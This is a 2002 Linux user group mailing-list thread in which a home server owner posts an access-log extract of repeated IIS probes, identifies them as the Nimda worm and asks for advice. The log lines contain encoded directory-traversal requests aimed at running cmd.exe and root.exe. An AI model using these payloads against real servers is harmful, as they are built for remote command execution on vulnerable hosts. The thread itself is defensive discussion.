[plug] Anyone seen this particular attack pattern before?
Mike
erazmus at iinet.net.au
Thu Jan 17 23:36:16 WST 2002
maybe set up a script to email the 'responsibleperson at domain.???'
as a means to 'close the loop' and pro-act the dying out rather
then just wait for the normal exponential curve with dither ;)
Gee ain't quantum statistics great,
rgds
mike
At 11:17 AM 17/1/2002 +0800, you wrote:
>Apologies, I should have done more research. It's NIMDA.
>
>Anyone have an answer to NIMDA? Or is it just something we have to put up
>with until it dies out? I'm getting a few hundred hits a day.
>
>Alan
>----- Original Message -----
>From: Alan Graham <alan.graham at infonetsystems.com.au>
>To: <plug at plug.linux.org.au>
>Sent: Thursday, January 17, 2002 11:03 AM
>Subject: [plug] Anyone seen this particular attack pattern before?
>
>
>> I've just set up a web server on my firewall, to show some photo's of the
>> kids to my folks in England. Within a few days, I started seeing this
>> attack. It comes in regularly, from a lot of different IP's, and it's
>> obviously aimed at NT IIS. Ha. I'm thinking it's a well known scripted
>> attack, or posibly a zombied attack? There's a pause of about 5 minutes
>> between each attack. The pisser is that most of the hosts appear to be
>> within iinet. I suppose I'd better let them know too.
>>
>> Can anyone tell me any more about it?
>>
>> Extract of access_log
>> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
>> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
>> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
>> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
>> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
>"-"
>> "-"
>> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>> HTTP/1.0" 404 321 "-" "-"
>> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>> HTTP/1.0" 404 321 "-" "-"
>> "GET
>>
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
>> stem32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
>> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
>"-"
>> "-"
>> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
>"-"
>> "-"
>> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
>"-"
>> "-"
>> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
>"-"
>> "-"
>> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
>> "-" "-"
>> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287
>"-"
>> "-"
>> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
>304
>> "-" "-"
>> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
>"-"
>> "-"
>>
>> Regards
>>
>> Alan Graham
>>
>>
>
>
>
More information about the plug
mailing list